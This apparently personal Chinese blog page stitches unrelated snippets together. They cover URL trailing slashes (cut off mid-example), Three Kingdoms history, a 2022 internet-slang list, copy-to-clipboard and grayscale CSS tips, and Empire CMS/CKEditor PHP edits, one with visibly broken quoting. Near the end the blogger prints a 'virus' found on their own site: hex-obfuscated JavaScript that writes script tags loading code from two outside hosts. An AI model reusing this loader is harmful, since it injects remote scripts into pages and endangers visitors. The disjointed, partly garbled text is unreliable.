通常情况下,url在末尾处是否加上斜杠“/”,对用户访问是没有太大影响的,大多数的Web 服务器均能正确解析,在传统意义上说,url末尾是没有反斜杠的,有没有反斜杠的意义在于该 url 是指向一个文件还是一个目录,举个例子:
从189年东汉名存实亡开始,中国再次进入了大分裂时代。此后,经过了三国、两晋、南北朝三个阶段,最终到589年完成了统一。在南北朝时期,北方的鲜卑族建立了北魏、北周、北齐等政权,南方出现了汉族建立的宋、齐、梁、陈四大王朝,南北相互对峙。在南北朝时期,南北方都相对比较稳定,为经济恢复、民族融合提供了条件,为后来的大一统奠定了基础。与此同时,在大漠出现了柔然、高车、突厥等争霸的局面。
狭义的三国时代,是指公元220年到280年西晋统一的这一段时间,而广义的三国则是公元189年东汉名存实亡到280年西晋统一的这个时代,大约有90年的时间。三国时代,是一个英雄辈出的时代,也是一个混乱的时代。这个时代,白骨露於野,千里无鸡鸣。中国人对三国时代的历史典故也十分感兴趣。然而,大部分人无法清晰掌握三国的历史发展脉络。本文就以地图为载体,介绍三国的历史发展脉络。
要了解三国历史,必须了解汉朝的行政区划。汉武帝时期,将全国分为了13个州,每个州设置一名刺史,负责监察地区内的官员。到了东汉时期,十三州的格局基本沿袭,但是刺史已经成为了最高的地方长官,州也成为了地方最高的行政区。在东汉后期,一些刺史的权利膨胀,演变为了州牧,他们就是汉末割据势力的主要来源。
12月8日,由《语言文字周报》主办的2022年“十大网络流行语”“十大网络热议语”公布结果。
上榜2022年“十大网络流行语”的有:“栓Q(我真的会谢)”“PUA(CPU/KTV/PPT/ICU)”“冤种(大冤种)”“小镇做题家”“团长/团”“退!退!退!”“嘴替”“一种很新的XX”“服了你个老六”“XX刺客”。
入选2022年“十大网络热议语”的有:“冰墩墩(冬奥会)”“二十大”“中国式现代化”“人民至上,生命至上”“做核酸”“俄乌冲突”“刘畊宏女孩/王心凌男孩”“数字经济”“网课”“卡塔尔世界杯”。
浏览网站时,我们经常看到一些点击复制一段文本的内容,比如 点击复制网页文件地址。
这个功能是怎么实现的呢?
其实需求不复杂的话,很简单。主要用到的就是 window的 selection 对象和Range对象,以及执行操作系统copy命令的代码。
HTML代码:
<span id="text">blog.lingruofeng.com</span> <a href="javascript:void(0)" id="copy">点击复制</a>
网站页面怎么变成灰色哀悼模式呢?
css里添加下面代码样式就可以了!
html { filter: grayscale(100%); -webkit-filter: grayscale(100%); -moz-filter: grayscale(100%); -ms-filter: grayscale(100%); -o-filter: grayscale(100%); filter:progid:DXImageTransform.Microsoft.BasicImage(grayscale=1); -webkit-filter: grayscale(1); }
帝国CMS更新到7.5版本之后,将老版fckeditor编辑器升级为CKEditor编辑器,新增了一键排版、一键过滤整理、多附件选择等功能,兼容性变得更好、功能更加实用。
不过,更新后的 CKEditor编辑器在编辑文章时,按下回车键后在源代码显示的是BR而非P标签,而按下shift + 回车键则变成P标签了。对于习惯于换行为P标签的我来说极为不便
ckeditor编辑器设置回车换行BR为段落P标签
要将帝国cms后台的 CKEditor编辑器设置为按下回车键换行为 P 标签,只需简单修改以下路径下的 config.js文件即可;
打开网站根目录下e\class\function.php文件:
一、删除两个空格:
搜索:$nbsp=' '; 改为:$nbsp='';
二、删除换行符
搜索: $ok='<br>'; 找到后改为:$ok='';
使用帝国CMS建站,想要在增加信息时自动把内容图片的alt和title属性替换为信息标题,具体怎么实现呢?下面一起来看看帝国CMS增加信息时自动把内容图片的alt和title属性替换为信息标题的操作方法。
操作方法如下:
1.把下面的代码放到/e/class/userfun.php (放到最后?>的前面)
function user_imgalt($mid,$f,$isadd,$isq,$value,$cs){ $title=$_POST['title']; $htmls=$value; $pattern = "/<img[^>]+>/"; preg_match_all($pattern, $htmls, $matches); for ($i=0; $i<=count($matches[0]); $i++) { preg_match_all("/alt=".+?"/",$matches[0][$i],$altimg); preg_match_all("/title=".+?"/",$matches[0][$i],$titleimg); $t_alt=count($altimg[0]); if($t_alt==0){ $htmls=str_replace("<img","<img alt="{$title}"",$htmls); $htmls=str_replace("<img","<img title="{$title}"",$htmls); } } return $htmls; }
今天打开一个自己的网页,竟发现了文件尾巴病毒源,真是可恶,空间商没做好杀毒防毒啊。
病毒源如下:
<script language="javascript"> window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x67\x67\x39\x39\x39\x2e\x35\x31\x36\x36\x2e\x69\x6e\x66\x6f\/\x67\x67\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e") </script> <script language="javascript"> window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x75\x73\x65\x72\x73\x33\x2e\x6a\x61\x62\x72\x79\x2e\x63\x6f\x6d\/\x67\x67\x69\x6e\x66\x6f\/\x69\x6e\x66\x6f\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e") </script>
扫码二维码
获取最新动态
个人博客